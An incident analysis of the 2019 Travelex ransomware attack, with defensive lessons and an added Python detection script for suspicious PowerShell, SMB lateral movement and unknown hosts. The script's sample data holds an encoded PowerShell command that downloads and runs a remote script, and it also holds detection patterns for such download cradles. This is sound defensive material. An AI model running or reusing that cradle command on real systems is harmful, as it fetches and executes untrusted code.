Calm Leadership and Visibility Key After Travelex Ransomware Attack
Travelex’s 2019 ransomware breach highlights the need for calm leadership and asset visibility in crisis response.

Proof of Concept: Anatomy of a Breach - Crisis Response
TL;DR: Travelex’s 2019 ransomware attack showed that calm leadership and clear asset visibility are critical when a breach turns into a business crisis.
Context
In late December 2019, Travelex took its websites and online services offline after attackers deployed Sodinokibi (REvil) ransomware across its network. The reported entry point was an unpatched Pulse Secure VPN appliance vulnerable to CVE-2019-11510, a pre-authentication arbitrary file read that exposes cached credentials and session data, for which vendor patches had been available since April 2019. Once the ransomware ran, it encrypted critical systems and the company shut down its website and foreign-exchange platforms.
Key Facts
The attack affected thousands of Travelex customers, though the company said it had found no evidence that customer data had been exfiltrated. Internal records, transaction systems, and backup servers were encrypted, leading to an estimated £25 million in recovery costs and a reported $2.3 million ransom payment. The intrusion followed a typical REvil playbook: initial access through the public-facing VPN flaw (MITRE ATT&CK T1190) and the credentials it exposed (T1078), execution through built-in Windows utilities such as PowerShell (T1059), lateral movement over SMB (T1021.002), and encryption of data with the Sodinokibi payload (T1486). Don Gibson, who was Travelex's security architecture lead at the time, stressed that leaders must set aside personal feelings and become a calm, clear voice for the organization. Lars Klinghammer, a DXC Technology remediation leader, warned that without knowing what assets exist and what activity is occurring, defenders cannot mount an effective defense.
What It Means
The incident underscores two practical lessons for security teams. First, establish clear communication chains so executives can convey stability without delay. Second, maintain a continuous asset inventory and network monitoring so anomalies are caught early; these are the kinds of countermeasures catalogued in MITRE D3FEND, the defensive counterpart to ATT&CK. Defenders should: apply the Pulse Secure VPN patches for CVE-2019-11510 and, because the flaw leaks credentials and session data, also reset VPN credentials and invalidate existing sessions rather than assuming the patch alone closes the door; enforce multi-factor authentication on remote access; segment critical networks; and deploy detection rules for Sodinokibi behaviors such as unusual PowerShell execution (T1059.001) and SMB lateral movement (T1021.002). Regularly test backup restoration and keep offline copies so that encrypted backup servers do not take the recovery path down with them. Looking ahead, watch for ransomware groups shifting to double-extortion tactics and for new advisories targeting VPN infrastructure.
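The three detection items above (encoded or hidden PowerShell, SMB fan-out from one account, and activity from hosts missing from the asset inventory) as one added example in Python. This is not code from the article, from Travelex, or from any vendor rule set; the inventory, hostnames, accounts, event records and thresholds are constructed for illustration, and the event layout is a simplified stand-in for Windows 4688/Sysmon 1 process-creation and 4624 network-logon records.

```python
"""Added example (not Travelex's or any vendor's code): detection logic for the
behaviours named above, run over constructed sample Windows events."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed asset inventory: hosts the security team expects to see logs from.
KNOWN_ASSETS = {"FIN-WS01", "FIN-WS02", "FX-DB01", "DC01"}


def _enc(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events modelled on process-creation (4688 / Sysmon 1) and network-logon
# (4624, logon type 3) records. For a 4624 the "host" is the machine that logged it,
# i.e. the destination of the SMB session; src_ip is where the session came from.
SAMPLE_EVENTS = [
    {"ts": "2019-12-31T02:10:05", "host": "FIN-WS01", "type": "process", "user": "CORP\\jsmith",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')")},
    {"ts": "2019-12-31T02:12:40", "host": "FIN-WS02", "type": "process", "user": "CORP\\backupsvc",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\nightly-backup.ps1"},
    {"ts": "2019-12-31T02:15:01", "host": "FIN-WS02", "type": "logon", "logon_type": 3,
     "user": "CORP\\jsmith", "src_ip": "10.20.1.15"},
    {"ts": "2019-12-31T02:15:30", "host": "FX-DB01", "type": "logon", "logon_type": 3,
     "user": "CORP\\jsmith", "src_ip": "10.20.1.15"},
    {"ts": "2019-12-31T02:16:12", "host": "DC01", "type": "logon", "logon_type": 3,
     "user": "CORP\\jsmith", "src_ip": "10.20.1.15"},
    {"ts": "2019-12-31T02:18:00", "host": "LAB-OLD07", "type": "logon", "logon_type": 3,
     "user": "CORP\\jsmith", "src_ip": "10.20.1.15"},
    {"ts": "2019-12-31T03:00:00", "host": "DC01", "type": "logon", "logon_type": 3,
     "user": "CORP\\backupsvc", "src_ip": "10.20.1.40"},
]

# Common spellings of the encoded-command switch; captures the base64 blob that follows.
ENC_FLAG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

# PowerShell patterns ransomware operators commonly combine (T1059.001).
PS_INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
    "bypass_policy": re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_findings(event: dict) -> list:
    """Sorted tags explaining why a PowerShell launch looks suspicious (empty if benign)."""
    if event["type"] != "process" or "powershell" not in event["image"].lower():
        return []
    decoded = decode_encoded_command(event["cmdline"])
    # Strip the base64 blob before matching so indicators never fire by chance inside it,
    # then append the decoded script so obfuscated cradles are still caught.
    text = ENC_FLAG.sub(" ", event["cmdline"]) + " " + (decoded or "")
    tags = {tag for tag, rx in PS_INDICATORS.items() if rx.search(text)}
    if decoded is not None:
        tags.add("encoded_command")
    return sorted(tags)


def smb_lateral_movement(events, window=timedelta(minutes=10), min_targets=3) -> dict:
    """Accounts with network (type 3) logons to >= min_targets distinct hosts inside
    `window`: the fan-out signature of SMB-based lateral movement (T1021.002)."""
    by_user = defaultdict(list)
    for e in events:
        if e["type"] == "logon" and e.get("logon_type") == 3:
            by_user[e["user"]].append((datetime.fromisoformat(e["ts"]), e["host"]))
    alerts = {}
    for user, logons in by_user.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= min_targets:
                alerts[user] = sorted(hosts)
                break
    return alerts


def unknown_assets(events, inventory=KNOWN_ASSETS) -> list:
    """Hosts that emitted events but are missing from the inventory."""
    return sorted({e["host"] for e in events} - set(inventory))


def run_detections(events) -> dict:
    """Run all three checks; PowerShell hits are keyed by 'host timestamp'."""
    ps = {f"{e['host']} {e['ts']}": powershell_findings(e) for e in events if e["type"] == "process"}
    return {"powershell": {k: v for k, v in ps.items() if v},
            "lateral_movement": smb_lateral_movement(events),
            "unknown_assets": unknown_assets(events)}


if __name__ == "__main__":
    import json
    print(json.dumps(run_detections(SAMPLE_EVENTS), indent=2))
```

On the constructed data the first process event is flagged for an encoded, hidden, no-profile download cradle, the benign backup script is not, CORP\jsmith's fan-out to four hosts in three minutes trips the lateral-movement rule, and LAB-OLD07 surfaces as a host nobody put in the inventory, which is exactly the visibility gap Klinghammer describes. The window and target threshold are illustrative; tune them against your own logon baseline so service accounts that legitimately touch many hosts do not drown the alert.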